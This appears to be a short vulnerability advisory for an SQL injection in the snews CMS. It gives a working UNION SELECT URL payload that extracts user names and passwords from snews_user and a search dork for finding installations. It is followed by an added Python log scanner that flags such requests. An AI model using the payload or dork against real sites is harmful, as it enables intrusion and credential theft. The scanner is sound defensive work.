Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keywords: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
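
A log check for the request shape above, as an added example that is not part of the original advisory: it flags any act=shownews request to snews.php whose id is not a plain decimal number and lists the SQL keywords found after decoding. The log lines are constructed, the function names are hypothetical, and treating legitimate id values as purely numeric is an assumption of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the original post); IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,'
    'concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 5300',
    '192.0.2.10 - - [01/Jan/2013:10:01:00 +0000] "GET /snews/snews.php?act=shownews&id=%32%34 HTTP/1.1" 200 4800',
    '192.0.2.77 - - [01/Jan/2013:10:02:00 +0000] "GET /snews/snews.php?act=shownews&id=5%2520UnIoN%2520SeLeCt%25201 HTTP/1.1" 200 100',
    '192.0.2.10 - - [01/Jan/2013:10:03:00 +0000] "GET /snews/index.php?page=about HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_WORDS = re.compile(r'\b(union|select|concat|from|where|like)\b', re.I)

def normalise(value, rounds=3):
    """Undo nested percent-encoding, then turn /*...*/ comments into spaces."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r'/\*.*?\*/', ' ', value)

def check_line(line):
    """Return (client, verdict, sql_words) for a suspicious shownews request, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer of %xx
    if not url.path.endswith('/snews.php') or query.get('act') != ['shownews']:
        return None
    for value in query.get('id', []):
        if re.fullmatch(r'[0-9]+', value):  # assumed: a legitimate id is a plain decimal number
            continue
        words = sorted({w.lower() for w in SQL_WORDS.findall(normalise(value))})
        return (line.split()[0], 'sqli' if words else 'non-numeric', words)
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and keep only the findings."""
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The allow-list test on id does the real work; the keyword list only grades the finding, so a payload that avoids those words is still reported as non-numeric.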

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*